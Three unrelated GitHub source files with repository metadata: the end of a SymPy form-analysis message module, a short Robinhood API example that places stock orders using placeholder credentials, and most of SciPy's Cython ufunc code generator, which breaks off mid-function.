'RATIONAL_REDUCIBLE':"Expression could be factored further in the rationals",
        'RATIONAL_FACTORED':"Expression is factored in the rationals"
}
@staticmethod
def strout(key):
return PolynomialOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+PolynomialOutput.messages.get(key, None)
class UtilOutput():
#Utility related return values
messages = {
'SIMPLIFIABLE_NUMERATOR':"Numerator can be simplified",
'SIMPLIFIABLE_DENOMINATOR':"Denominator can be simplified",
'SIMPLIFIABLE_FRACTION':"Terms in fraction can be cancelled",
'NOT_SIMPLIFIABLE_FRACTION':"No terms can be cancelled in fraction",
'CONST_TO_CONST':"Expression is a constant raised to a constant",
'NOT_CONST_TO_CONST':"Expression isn't a constant raised to a constant",
'ONE_OVER_N':"Expression is raised to 1/n",
'ONE_TO_N':"Expression is 1 raised to a power",
'REDUCIBLE':"Expression is numerically reducible",
'INVERSE_N':"Expression is raised to -1",
'CONST_DIVISIBLE':"One or more terms can be combined",
'NOT_CONST_DIVISIBLE':"Terms cannot be combined by constants",
'TRIG_CAN_SIMPLIFY':"Can be simplified by a trig identity",
'TRIG_CANT_SIMPLIFY':"Can't be simplified by trig identities"
}
@staticmethod
def strout(key):
return UtilOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+UtilOutput.messages.get(key, None)
class NumBaseOutput():
messages = {
'SMALLER_BASE_EXISTS':"Base could be made smaller",
'SMALLEST_BASE':"Smallest bases possible",
'SIMPLE_BASES':"No bases can be combined",
'NOT_SIMPLE_BASES':"Bases can be combined",
'EXP_0': "Redundant exponent of 0 detected",
'EXP_1': "Redundant exponent of 1 detected",
'EXP_OK': "Exponents in expression are OK",
'MULTIPLE_TERMS':"Multiple terms detected",
'NOT_POW':"Not an expression raised to a power",
'SINGLETON':"Expression is also a singleton"
}
@staticmethod
def strout(key):
return NumBaseOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+NumBaseOutput.messages.get(key, None)
class ErrorOutput:
#Error related return values
messages = {
'ERROR': "If you see this, we goofed. Email us!"
}
@staticmethod
def strout(key):
return ErrorOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+ErrorOutput.messages.get(key, None)
| {
"content_hash": "31a4a706d652ad97434b60acf0a0ce4c",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 85,
"avg_line_length": 39.89041095890411,
"alnum_prop": 0.6559065934065934,
"repo_name": "lemmalearning/sympy-form-analysis",
"id": "f7e811eb029af43e29ff5dff39a04cdfaac90e81",
"size": "5824",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "form_output.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "65169"
}
],
"symlink_target": ""
} |
from Robinhood import Robinhood
my_trader = Robinhood(username="USERNAME HERE", password="PASSWORD HERE")
#get instrument information for a stock
# Note: for some stock names, more than one instrument
# may be returned for a given stock symbol
stock_instrument = my_trader.instruments("GEVO")[0]
#You can get quote information such as the current bid_price, etc
quote_info = my_trader.quote_data("GEVO")
#place a buy order (uses market bid price)
buy_order = my_trader.place_buy_order(stock_instrument, 1)
#place a sell order
sell_order = my_trader.place_sell_order(stock_instrument, 1)
| {
"content_hash": "3227fe182c577a999f4a0387c4804aa8",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 73,
"avg_line_length": 32.55555555555556,
"alnum_prop": 0.7559726962457338,
"repo_name": "imbellish/Robinhood",
"id": "0f0eede8d2bdf3895d458c8edd0bcab1c5d19169",
"size": "586",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4494"
}
],
"symlink_target": ""
} |
"""
python _generate_pyx.py
Generate Ufunc definition source files for scipy.special. Produces
files '_ufuncs.c' and '_ufuncs_cxx.c' by first producing Cython.
This will generate both calls to PyUFunc_FromFuncAndData and the
required ufunc inner loops.
The function signatures are contained in 'functions.json'; the syntax
for a function signature is
<function>: <name> ':' <input> '*' <output>
'->' <retval> '*' <ignored_retval>
<input>: <typecode>*
<output>: <typecode>*
<retval>: <typecode>?
<ignored_retval>: <typecode>?
<headers>: <header_name> [',' <header_name>]*
The input parameter types are denoted by single character type
codes, according to
'f': 'float'
'd': 'double'
'g': 'long double'
'F': 'float complex'
'D': 'double complex'
'G': 'long double complex'
'i': 'int'
'l': 'long'
'v': 'void'
If multiple kernel functions are given for a single ufunc, the one
which is used is determined by the standard ufunc mechanism. Kernel
functions that are listed first are also matched first against the
ufunc input types, so functions listed earlier take precedence.
In addition, versions with cast variables, such as d->f, D->F and
i->d, are automatically generated.
There should be either a single header that contains all of the kernel
functions listed, or there should be one header for each kernel
function. Cython pxd files are allowed in addition to .h files.
Cython functions may use fused types, but the names in the list
should be the specialized ones, such as 'somefunc[float]'.
Function coming from C++ should have ``++`` appended to the name of
the header.
Floating-point exceptions inside these Ufuncs are converted to
special function errors --- which are separately controlled by the
user, and off by default, as they are usually not especially useful
for the user.
The C++ module
--------------
In addition to ``_ufuncs`` module, a second module ``_ufuncs_cxx`` is
generated. This module only exports function pointers that are to be
used when constructing some of the ufuncs in ``_ufuncs``. The function
pointers are exported via Cython's standard mechanism.
This mainly avoids build issues --- Python distutils has no way to
figure out what to do if you want to link both C++ and Fortran code in
the same shared library.
"""
# -----------------------------------------------------------------------------
# Extra code
# -----------------------------------------------------------------------------
UFUNCS_EXTRA_CODE_COMMON = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
from libc.math cimport NAN
include "_ufuncs_extra_code_common.pxi"
"""
UFUNCS_EXTRA_CODE = """\
include "_ufuncs_extra_code.pxi"
"""
UFUNCS_EXTRA_CODE_BOTTOM = """\
#
# Aliases
#
jn = jv
"""
CYTHON_SPECIAL_PXD = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
ctypedef fused number_t:
double complex
double
cpdef number_t spherical_jn(long n, number_t z, bint derivative=*) nogil
cpdef number_t spherical_yn(long n, number_t z, bint derivative=*) nogil
cpdef number_t spherical_in(long n, number_t z, bint derivative=*) nogil
cpdef number_t spherical_kn(long n, number_t z, bint derivative=*) nogil
"""
CYTHON_SPECIAL_PYX = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
\"\"\"
.. highlight:: cython
Cython API for special functions
================================
Scalar, typed versions of many of the functions in ``scipy.special``
can be accessed directly from Cython; the complete list is given
below. Functions are overloaded using Cython fused types so their
names match their Python counterpart. The module follows the following
conventions:
- If a function's Python counterpart returns multiple values, then the
function returns its outputs via pointers in the final arguments.
- If a function's Python counterpart returns a single value, then the
function's output is returned directly.
The module is usable from Cython via::
cimport scipy.special.cython_special
Error handling
--------------
Functions can indicate an error by returning ``nan``; however they
cannot emit warnings like their counterparts in ``scipy.special``.
Available functions
-------------------
FUNCLIST
Custom functions
----------------
Some functions in ``scipy.special`` which are not ufuncs have custom
Cython wrappers.
Spherical Bessel functions
~~~~~~~~~~~~~~~~~~~~~~~~~~
The optional ``derivative`` boolean argument is replaced with an
optional Cython ``bint``, leading to the following signatures.
- :py:func:`~scipy.special.spherical_jn`::
double complex spherical_jn(long, double complex)
double complex spherical_jn(long, double complex, bint)
double spherical_jn(long, double)
double spherical_jn(long, double, bint)
- :py:func:`~scipy.special.spherical_yn`::
double complex spherical_yn(long, double complex)
double complex spherical_yn(long, double complex, bint)
double spherical_yn(long, double)
double spherical_yn(long, double, bint)
- :py:func:`~scipy.special.spherical_in`::
double complex spherical_in(long, double complex)
double complex spherical_in(long, double complex, bint)
double spherical_in(long, double)
double spherical_in(long, double, bint)
- :py:func:`~scipy.special.spherical_kn`::
double complex spherical_kn(long, double complex)
double complex spherical_kn(long, double complex, bint)
double spherical_kn(long, double)
double spherical_kn(long, double, bint)
\"\"\"
from libc.math cimport NAN
include "_cython_special.pxi"
include "_cython_special_custom.pxi"
"""
STUBS = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
from typing import Any, Dict
import numpy as np
__all__ = [
'geterr',
'seterr',
'errstate',
{ALL}
]
def geterr() -> Dict[str, str]: ...
def seterr(**kwargs: str) -> Dict[str, str]: ...
class errstate:
def __init__(self, **kargs: str) -> None: ...
def __enter__(self) -> None: ...
def __exit__(
self,
exc_type: Any, # Unused
exc_value: Any, # Unused
traceback: Any, # Unused
) -> None: ...
{STUBS}
"""
# -----------------------------------------------------------------------------
# Code generation
# -----------------------------------------------------------------------------
import itertools
import json
import os
from stat import ST_MTIME
import argparse
import re
import textwrap
from typing import List
import numpy
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
add_newdocs = __import__('_add_newdocs')
CY_TYPES = {
'f': 'float',
'd': 'double',
'g': 'long double',
'F': 'float complex',
'D': 'double complex',
'G': 'long double complex',
'i': 'int',
'l': 'long',
'v': 'void',
}
C_TYPES = {
'f': 'npy_float',
'd': 'npy_double',
'g': 'npy_longdouble',
'F': 'npy_cfloat',
'D': 'npy_cdouble',
'G': 'npy_clongdouble',
'i': 'npy_int',
'l': 'npy_long',
'v': 'void',
}
TYPE_NAMES = {
'f': 'NPY_FLOAT',
'd': 'NPY_DOUBLE',
'g': 'NPY_LONGDOUBLE',
'F': 'NPY_CFLOAT',
'D': 'NPY_CDOUBLE',
'G': 'NPY_CLONGDOUBLE',
'i': 'NPY_INT',
'l': 'NPY_LONG',
}
CYTHON_SPECIAL_BENCHFUNCS = {
'airy': ['d*dddd', 'D*DDDD'],
'beta': ['dd'],
'erf': ['d', 'D'],
'exprel': ['d'],
'gamma': ['d', 'D'],
'jv': ['dd', 'dD'],
'loggamma': ['D'],
'logit': ['d'],
'psi': ['d', 'D'],
}
def underscore(arg):
return arg.replace(" ", "_")
def cast_order(c):
return ['ilfdgFDG'.index(x) for x in c]
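# For example (derived from the line above, shown for orientation):
# cast_order('dl') == [3, 1], i.e. each code's position in the widening
# order 'ilfdgFDG'.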
# These downcasts will cause the function to return NaNs, unless the
# values happen to coincide exactly.
DANGEROUS_DOWNCAST = set([
('F', 'i'), ('F', 'l'), ('F', 'f'), ('F', 'd'), ('F', 'g'),
('D', 'i'), ('D', 'l'), ('D', 'f'), ('D', 'd'), ('D', 'g'),
('G', 'i'), ('G', 'l'), ('G', 'f'), ('G', 'd'), ('G', 'g'),
('f', 'i'), ('f', 'l'),
('d', 'i'), ('d', 'l'),
('g', 'i'), ('g', 'l'),
('l', 'i'),
])
NAN_VALUE = {
'f': 'NAN',
'd': 'NAN',
'g': 'NAN',
'F': 'NAN',
'D': 'NAN',
'G': 'NAN',
'i': '0xbad0bad0',
'l': '0xbad0bad0',
}
def generate_loop(func_inputs, func_outputs, func_retval,
ufunc_inputs, ufunc_outputs):
"""
Generate a UFunc loop function that calls a function given as its
data parameter with the specified input and output arguments and
return value.
This function can be passed to PyUFunc_FromFuncAndData.
Parameters
----------
func_inputs, func_outputs, func_retval : str
Signature of the function to call, given as type codes of the
input, output and return value arguments. These 1-character
codes are given according to the CY_TYPES and TYPE_NAMES
lists above.
The corresponding C function signature to be called is:
retval func(intype1 iv1, intype2 iv2, ..., outtype1 *ov1, ...);
If len(ufunc_outputs) == len(func_outputs)+1, the return value
is treated as the first output argument. Otherwise, the return
value is ignored.
ufunc_inputs, ufunc_outputs : str
Ufunc input and output signature.
This does not have to exactly match the function signature,
as long as the type casts work out on the C level.
Returns
-------
loop_name
Name of the generated loop function.
loop_body
Generated C code for the loop.
"""
if len(func_inputs) != len(ufunc_inputs):
raise ValueError("Function and ufunc have different number of inputs")
if len(func_outputs) != len(ufunc_outputs) and not (
func_retval != "v" and len(func_outputs)+1 == len(ufunc_outputs)):
raise ValueError("Function retval and ufunc outputs don't match")
name = "loop_%s_%s_%s_As_%s_%s" % (
func_retval, func_inputs, func_outputs, ufunc_inputs, ufunc_outputs
)
body = "cdef void %s(char **args, np.npy_intp *dims, np.npy_intp *steps, void *data) nogil:\n" % name
body += " cdef np.npy_intp i, n = dims[0]\n"
body += " cdef void *func = (<void**>data)[0]\n"
body += " cdef char *func_name = <char*>(<void**>data)[1]\n"
for j in range(len(ufunc_inputs)):
body += " cdef char *ip%d = args[%d]\n" % (j, j)
for j in range(len(ufunc_outputs)):
body += " cdef char *op%d = args[%d]\n" % (j, j + len(ufunc_inputs))
ftypes = []
fvars = []
outtypecodes = []
for j in range(len(func_inputs)):
ftypes.append(CY_TYPES[func_inputs[j]])
fvars.append("<%s>(<%s*>ip%d)[0]" % (
CY_TYPES[func_inputs[j]],
CY_TYPES[ufunc_inputs[j]], j))
if len(func_outputs)+1 == len(ufunc_outputs):
func_joff = 1
outtypecodes.append(func_retval)
body += " cdef %s ov0\n" % (CY_TYPES[func_retval],)
else:
func_joff = 0
for j, outtype in enumerate(func_outputs):
body += " cdef %s ov%d\n" % (CY_TYPES[outtype], j+func_joff)
ftypes.append("%s *" % CY_TYPES[outtype])
fvars.append("&ov%d" % (j+func_joff))
outtypecodes.append(outtype)
body += " for i in range(n):\n"
if len(func_outputs)+1 == len(ufunc_outputs):
rv = "ov0 = "
else:
rv = ""
funcall = " %s(<%s(*)(%s) nogil>func)(%s)\n" % (
rv, CY_TYPES[func_retval], ", ".join(ftypes), ", ".join(fvars))
# Cast-check inputs and call function
input_checks = []
for j in range(len(func_inputs)):
if (ufunc_inputs[j], func_inputs[j]) in DANGEROUS_DOWNCAST:
chk = "<%s>(<%s*>ip%d)[0] == (<%s*>ip%d)[0]" % (
CY_TYPES[func_inputs[j]], CY_TYPES[ufunc_inputs[j]], j,
CY_TYPES[ufunc_inputs[j]], j)
input_checks.append(chk)
if input_checks:
body += " if %s:\n" % (" and ".join(input_checks))
body += " " + funcall
body += " else:\n"
body += " sf_error.error(func_name, sf_error.DOMAIN, \"invalid input argument\")\n"
for j, outtype in enumerate(outtypecodes):
body += " ov%d = <%s>%s\n" % (
j, CY_TYPES[outtype], NAN_VALUE[outtype])
else:
body += funcall
# Assign and cast-check output values
for j, (outtype, fouttype) in enumerate(zip(ufunc_outputs, outtypecodes)):
if (fouttype, outtype) in DANGEROUS_DOWNCAST:
body += " if ov%d == <%s>ov%d:\n" % (j, CY_TYPES[outtype], j)
body += " (<%s *>op%d)[0] = <%s>ov%d\n" % (
CY_TYPES[outtype], j, CY_TYPES[outtype], j)
body += " else:\n"
body += " sf_error.error(func_name, sf_error.DOMAIN, \"invalid output\")\n"
body += " (<%s *>op%d)[0] = <%s>%s\n" % (
CY_TYPES[outtype], j, CY_TYPES[outtype], NAN_VALUE[outtype])
else:
body += " (<%s *>op%d)[0] = <%s>ov%d\n" % (
CY_TYPES[outtype], j, CY_TYPES[outtype], j)
for j in range(len(ufunc_inputs)):
body += " ip%d += steps[%d]\n" % (j, j)
for j in range(len(ufunc_outputs)):
body += " op%d += steps[%d]\n" % (j, j + len(ufunc_inputs))
body += " sf_error.check_fpe(func_name)\n"
return name, body
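# For orientation (derived from the name format above):
# generate_loop('dd', '', 'd', 'dd', 'd') returns the name
# "loop_d_dd__As_dd_d" together with the source of a loop function that reads
# two double inputs, calls the kernel through the data pointer, and stores
# the double result.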
def generate_fused_type(codes):
"""
Generate name of and cython code for a fused type.
Parameters
----------
codes : str
Valid inputs to CY_TYPES (i.e. f, d, g, ...).
"""
cytypes = [CY_TYPES[x] for x in codes]
name = codes + "_number_t"
declaration = ["ctypedef fused " + name + ":"]
for cytype in cytypes:
declaration.append(" " + cytype)
declaration = "\n".join(declaration)
return name, declaration
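# For example (derived from the code above), generate_fused_type("Dd")
# returns the name "Dd_number_t" together with the declaration
#
#   ctypedef fused Dd_number_t:
#       double complex
#       double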
def generate_bench(name, codes):
tab = " "*4
top, middle, end = [], [], []
tmp = codes.split("*")
if len(tmp) > 1:
incodes = tmp[0]
outcodes = tmp[1]
else:
incodes = tmp[0]
outcodes = ""
inargs, inargs_and_types = [], []
for n, code in enumerate(incodes):
arg = "x{}".format(n)
inargs.append(arg)
inargs_and_types.append("{} {}".format(CY_TYPES[code], arg))
line = "def {{}}(int N, {}):".format(", ".join(inargs_and_types))
top.append(line)
top.append(tab + "cdef int n")
outargs = []
for n, code in enumerate(outcodes):
arg = "y{}".format(n)
outargs.append("&{}".format(arg))
line = "cdef {} {}".format(CY_TYPES[code], arg)
middle.append(tab + line)
end.append(tab + "for n in range(N):")
end.append(2*tab + "{}({})")
pyfunc = "_bench_{}_{}_{}".format(name, incodes, "py")
cyfunc = "_bench_{}_{}_{}".format(name, incodes, "cy")
pytemplate = "\n".join(top + end)
cytemplate = "\n".join(top + middle + end)
pybench = pytemplate.format(pyfunc, "_ufuncs." + name, ", ".join(inargs))
cybench = cytemplate.format(cyfunc, name, ", ".join(inargs + outargs))
return pybench, cybench
def generate_doc(name, specs):
tab = " "*4
doc = ["- :py:func:`~scipy.special.{}`::\n".format(name)]
for spec in specs:
incodes, outcodes = spec.split("->")
incodes = incodes.split("*")
intypes = [CY_TYPES[x] for x in incodes[0]]
if len(incodes) > 1:
types = [f"{CY_TYPES[x]} *" for x in incodes[1]]
intypes.extend(types)
outtype = CY_TYPES[outcodes]
line = "{} {}({})".format(outtype, name, ", ".join(intypes))
doc.append(2*tab + line)
doc[-1] = "{}\n".format(doc[-1])
doc = "\n".join(doc)
return doc
def npy_cdouble_from_double_complex(var):
"""Cast a Cython double complex to a NumPy cdouble."""
res = "_complexstuff.npy_cdouble_from_double_complex({})".format(var)
return res
def double_complex_from_npy_cdouble(var):
"""Cast a NumPy cdouble to a Cython double complex."""
res = "_complexstuff.double_complex_from_npy_cdouble({})".format(var)
return res
def iter_variants(inputs, outputs):
"""
Generate variants of UFunc signatures, by changing variable types,
    within the limitation that the corresponding C type casts still
work out.
This does not generate all possibilities, just the ones required
for the ufunc to work properly with the most common data types.
Parameters
----------
inputs, outputs : str
UFunc input and output signature strings
Yields
------
new_input, new_output : str
Modified input and output strings.
Also the original input/output pair is yielded.
"""
maps = [
# always use long instead of int (more common type on 64-bit)
('i', 'l'),
]
# float32-preserving signatures
if not ('i' in inputs or 'l' in inputs):
# Don't add float32 versions of ufuncs with integer arguments, as this
# can lead to incorrect dtype selection if the integer arguments are
# arrays, but float arguments are scalars.
# For instance sph_harm(0,[0],0,0).dtype == complex64
# This may be a NumPy bug, but we need to work around it.
# cf. gh-4895, https://github.com/numpy/numpy/issues/5895
maps = maps + [(a + 'dD', b + 'fF') for a, b in maps]
# do the replacements
for src, dst in maps:
new_inputs = inputs
new_outputs = outputs
for a, b in zip(src, dst):
new_inputs = new_inputs.replace(a, b)
new_outputs = new_outputs.replace(a, b)
yield new_inputs, new_outputs
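# For example (derived from the maps above): iter_variants('dd', 'd') first
# yields ('dd', 'd') unchanged (the 'i' -> 'l' map has nothing to replace)
# and then the float32-preserving variant ('ff', 'f').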
class Func:
"""
Base class for Ufunc and FusedFunc.
"""
def __init__(self, name, signatures):
self.name = name
self.signatures = []
self.function_name_overrides = {}
for header in signatures.keys():
for name, sig in signatures[header].items():
inarg, outarg, ret = self._parse_signature(sig)
self.signatures.append((name, inarg, outarg, ret, header))
def _parse_signature(self, sig):
m = re.match(r"\s*([fdgFDGil]*)\s*\*\s*([fdgFDGil]*)\s*->\s*([*fdgFDGil]*)\s*$", sig)
if m:
inarg, outarg, ret = [x.strip() for x in m.groups()]
if ret.count('*') > 1:
raise ValueError("{}: Invalid signature: {}".format(self.name, sig))
return inarg, outarg, ret
m = re.match(r"\s*([fdgFDGil]*)\s*->\s*([fdgFDGil]?)\s*$", sig)
if m:
inarg, ret = [x.strip() for x in m.groups()]
return inarg, "", ret
raise ValueError("{}: Invalid signature: {}".format(self.name, sig))
def get_prototypes(self, nptypes_for_h=False):
prototypes = []
for func_name, inarg, outarg, ret, header in self.signatures:
ret = ret.replace('*', '')
c_args = ([C_TYPES[x] for x in inarg]
+ [C_TYPES[x] + ' *' for x in outarg])
cy_args = ([CY_TYPES[x] for x in inarg]
+ [CY_TYPES[x] + ' *' for x in outarg])
c_proto = "%s (*)(%s)" % (C_TYPES[ret], ", ".join(c_args))
if header.endswith("h") and nptypes_for_h:
                cy_proto = c_proto + " nogil"
else:
cy_proto = "%s (*)(%s) nogil" % (CY_TYPES[ret], ", ".join(cy_args))
prototypes.append((func_name, c_proto, cy_proto, header))
return prototypes
def cython_func_name(self, c_name, specialized=False, prefix="_func_",
override=True):
# act on function name overrides
if override and c_name in self.function_name_overrides:
c_name = self.function_name_overrides[c_name]
prefix = ""
# support fused types
m = re.match(r'^(.*?)(\[.*\])$', c_name)
if m:
c_base_name, fused_part = m.groups()
else:
c_base_name, fused_part = c_name, ""
if specialized:
return "%s%s%s" % (prefix, c_base_name, fused_part.replace(' ', '_'))
else:
return "%s%s" % (prefix, c_base_name,)
class Ufunc(Func):
"""
Ufunc signature, restricted format suitable for special functions.
Parameters
----------
name
Name of the ufunc to create
signature
String of form 'func: fff*ff->f, func2: ddd->*i' describing
the C-level functions and types of their input arguments
and return values.
The syntax is 'function_name: inputparams*outputparams->output_retval*ignored_retval'
Attributes
----------
name : str
Python name for the Ufunc
signatures : list of (func_name, inarg_spec, outarg_spec, ret_spec, header_name)
List of parsed signatures
doc : str
Docstring, obtained from add_newdocs
function_name_overrides : dict of str->str
Overrides for the function names in signatures
"""
def __init__(self, name, signatures):
super().__init__(name, signatures)
self.doc = add_newdocs.get(name)
if self.doc is None:
raise ValueError("No docstring for ufunc %r" % name)
self.doc = textwrap.dedent(self.doc).strip()
def _get_signatures_and_loops(self, all_loops):
inarg_num = None
outarg_num = None
seen = set()
variants = []
def add_variant(func_name, inarg, outarg, ret, inp, outp):
if inp in seen:
return
seen.add(inp)
sig = (func_name, inp, outp)
if "v" in outp:
raise ValueError("%s: void signature %r" % (self.name, sig))
if len(inp) != inarg_num or len(outp) != outarg_num:
raise ValueError("%s: signature %r does not have %d/%d input/output args" % (
self.name, sig,
inarg_num, outarg_num))
loop_name, loop = generate_loop(inarg, outarg, ret, inp, outp)
all_loops[loop_name] = loop
variants.append((func_name, loop_name, inp, outp))
# First add base variants
for func_name, inarg, outarg, ret, header in self.signatures:
outp = re.sub(r'\*.*', '', ret) + outarg
ret = ret.replace('*', '')
if inarg_num is None:
inarg_num = len(inarg)
outarg_num = len(outp)
inp, outp = list(iter_variants(inarg, outp))[0]
add_variant(func_name, inarg, outarg, ret, inp, outp)
# Then the supplementary ones
for func_name, inarg, outarg, ret, header in self.signatures:
outp = re.sub(r'\*.*', '', ret) + outarg
ret = ret.replace('*', '')
for inp, outp in iter_variants(inarg, outp):
add_variant(func_name, inarg, outarg, ret, inp, outp)
# Then sort variants to input argument cast order
# -- the sort is stable, so functions earlier in the signature list
# are still preferred
variants.sort(key=lambda v: cast_order(v[2]))
return variants, inarg_num, outarg_num
def generate(self, all_loops):
toplevel = ""
variants, inarg_num, outarg_num = self._get_signatures_and_loops(
all_loops)
loops = []
funcs = []
types = []
for func_name, loop_name, inputs, outputs in variants:
for x in inputs:
types.append(TYPE_NAMES[x])
for x in outputs:
types.append(TYPE_NAMES[x])
loops.append(loop_name)
funcs.append(func_name)
toplevel += "cdef np.PyUFuncGenericFunction ufunc_%s_loops[%d]\n" % (self.name, len(loops))
toplevel += "cdef void *ufunc_%s_ptr[%d]\n" % (self.name, 2*len(funcs))
toplevel += "cdef void *ufunc_%s_data[%d]\n" % (self.name, len(funcs))
toplevel += "cdef char ufunc_%s_types[%d]\n" % (self.name, len(types))
toplevel += 'cdef char *ufunc_%s_doc = (\n "%s")\n' % (
self.name,
self.doc.replace("\\", "\\\\").replace('"', '\\"').replace('\n', '\\n\"\n "')
)
for j, function in enumerate(loops):
toplevel += "ufunc_%s_loops[%d] = <np.PyUFuncGenericFunction>%s\n" % (self.name, j, function)
for j, type in enumerate(types):
toplevel += "ufunc_%s_types[%d] = <char>%s\n" % (self.name, j, type)
for j, func in enumerate(funcs):
toplevel += "ufunc_%s_ptr[2*%d] = <void*>%s\n" % (self.name, j,
self.cython_func_name(func, specialized=True))
toplevel += "ufunc_%s_ptr[2*%d+1] = <void*>(<char*>\"%s\")\n" % (self.name, j,
self.name)
for j, func in enumerate(funcs):
toplevel += "ufunc_%s_data[%d] = &ufunc_%s_ptr[2*%d]\n" % (
self.name, j, self.name, j)
toplevel += ('@ = np.PyUFunc_FromFuncAndData(ufunc_@_loops, '
'ufunc_@_data, ufunc_@_types, %d, %d, %d, 0, '
'"@", ufunc_@_doc, 0)\n' % (len(types)/(inarg_num+outarg_num),
inarg_num, outarg_num)
).replace('@', self.name)
return toplevel
class FusedFunc(Func):
"""
Generate code for a fused-type special function that can be
cimported in Cython.
"""
def __init__(self, name, signatures):
super().__init__(name, signatures)
self.doc = "See the documentation for scipy.special." + self.name
# "codes" are the keys for CY_TYPES
self.incodes, self.outcodes = self._get_codes()
self.fused_types = set()
self.intypes, infused_types = self._get_types(self.incodes)
self.fused_types.update(infused_types)
self.outtypes, outfused_types = self._get_types(self.outcodes)
self.fused_types.update(outfused_types)
self.invars, self.outvars = self._get_vars()
def _get_codes(self):
inarg_num, outarg_num = None, None
all_inp, all_outp = [], []
for _, inarg, outarg, ret, _ in self.signatures:
outp = re.sub(r'\*.*', '', ret) + outarg
if inarg_num is None:
inarg_num = len(inarg)
outarg_num = len(outp)
inp, outp = list(iter_variants(inarg, outp))[0]
all_inp.append(inp)
all_outp.append(outp)
incodes = []
for n in range(inarg_num):
codes = unique([x[n] for x in all_inp])
codes.sort()
incodes.append(''.join(codes))
outcodes = []
for n in range(outarg_num):
codes = unique([x[n] for x in all_outp])
codes.sort()
outcodes.append(''.join(codes))
return tuple(incodes), tuple(outcodes)
def _get_types(self, codes):
all_types = []
fused_types = set()
for code in codes:
if len(code) == 1:
# It's not a fused type
all_types.append((CY_TYPES[code], code))
else:
# It's a fused type
fused_type, dec = generate_fused_type(code)
fused_types.add(dec)
all_types.append((fused_type, code))
return all_types, fused_types
def _get_vars(self):
invars = ["x{}".format(n) for n in range(len(self.intypes))]
outvars = ["y{}".format(n) for n in range(len(self.outtypes))]
return invars, outvars
def _get_conditional(self, types, codes, adverb):
"""Generate an if/elif/else clause that selects a specialization of
fused types.
"""
clauses = []
seen = set()
for (typ, typcode), code in zip(types, codes):
if len(typcode) == 1:
continue
if typ not in seen:
clauses.append(f"{typ} is {underscore(CY_TYPES[code])}")
seen.add(typ)
if clauses and adverb != "else":
line = "{} {}:".format(adverb, " and ".join(clauses))
elif clauses and adverb == "else":
line = "else:"
else:
line = None
return line
def _get_incallvars(self, intypes, c):
"""Generate pure input variables to a specialization,
i.e., variables that aren't used to return a value.
"""
incallvars = []
for n, intype in enumerate(intypes):
var = self.invars[n]
if c and intype == "double complex":
var = npy_cdouble_from_double_complex(var)
incallvars.append(var)
return incallvars
def _get_outcallvars(self, outtypes, c):
"""Generate output variables to a specialization,
i.e., pointers that are used to return values.
"""
outcallvars, tmpvars, casts = [], [], []
# If there are more out variables than out types, we want the
# tail of the out variables
start = len(self.outvars) - len(outtypes)
outvars = self.outvars[start:]
for n, (var, outtype) in enumerate(zip(outvars, outtypes)):
if c and outtype == "double complex":
tmp = "tmp{}".format(n)
tmpvars.append(tmp)
outcallvars.append("&{}".format(tmp))
tmpcast = double_complex_from_npy_cdouble(tmp)
casts.append("{}[0] = {}".format(var, tmpcast))
else:
outcallvars.append("{}".format(var))
return outcallvars, tmpvars, casts
def _get_nan_decs(self):
"""Set all variables to nan for specializations of fused types for
        which we don't have signatures.
"""
# Set non fused-type variables to nan
tab = " "*4
fused_types, lines = [], [tab + "else:"]
seen = set()
for outvar, outtype, code in zip(self.outvars, self.outtypes,
self.outcodes):
if len(code) == 1:
line = "{}[0] = {}".format(outvar, NAN_VALUE[code])
lines.append(2*tab + line)
else:
fused_type = outtype
name, _ = fused_type
if name not in seen:
fused_types.append(fused_type)
seen.add(name)
if not fused_types:
return lines
# Set fused-type variables to nan
all_codes = tuple([codes for _unused, codes in fused_types])
codelens = [len(x) for x in all_codes]
last = numpy.prod(codelens) - 1
for m, codes in enumerate(itertools.product(*all_codes)):
fused_codes, decs = [], []
for n, fused_type in enumerate(fused_types):
code = codes[n]
fused_codes.append(underscore(CY_TYPES[code]))
for nn, outvar in enumerate(self.outvars):
if self.outtypes[nn] == fused_type:
line = "{}[0] = {}".format(outvar, NAN_VALUE[code])
decs.append(line)
if m == 0:
adverb = "if"
elif m == last:
adverb = "else"
else:
adverb = "elif"
cond = self._get_conditional(fused_types, codes, adverb)
lines.append(2*tab + cond)
lines.extend([3*tab + x for x in decs])
return lines
def _get_tmp_decs(self, all_tmpvars):
"""Generate the declarations of any necessary temporary
variables.
"""
tab = " "*4
tmpvars = list(all_tmpvars)
tmpvars.sort()
tmpdecs = [tab + "cdef npy_cdouble {}".format(tmpvar)
for tmpvar in tmpvars]
return tmpdecs
def _get_python_wrap(self):
"""Generate a Python wrapper for functions which pass their
arguments as pointers.
"""
tab = " "*4
body, callvars = [], []
for (intype, _), invar in zip(self.intypes, self.invars):
callvars.append("{} {}".format(intype, invar))
line = "def _{}_pywrap({}):".format(self.name, ", ".join(callvars))
body.append(line)
for (outtype, _), outvar in zip(self.outtypes, self.outvars):
line = "cdef {} {}".format(outtype, outvar)
body.append(tab + line)
addr_outvars = [f"&{x}" for x in self.outvars]
line = "{}({}, {})".format(self.name, ", ".join(self.invars),
", ".join(addr_outvars))
body.append(tab + line)
line = "return {}".format(", ".join(self.outvars))
body.append(tab + line)
body = "\n".join(body)
return body
def _get_common(self, signum, sig):
"""Generate code common to all the _generate_* methods."""
tab = " "*4
func_name, incodes, outcodes, retcode, header = sig
# Convert ints to longs; cf. iter_variants()
incodes = incodes.replace('i', 'l')
outcodes = outcodes.replace('i', 'l')
retcode = retcode.replace('i', 'l')
if header.endswith("h"):
c = True
else:
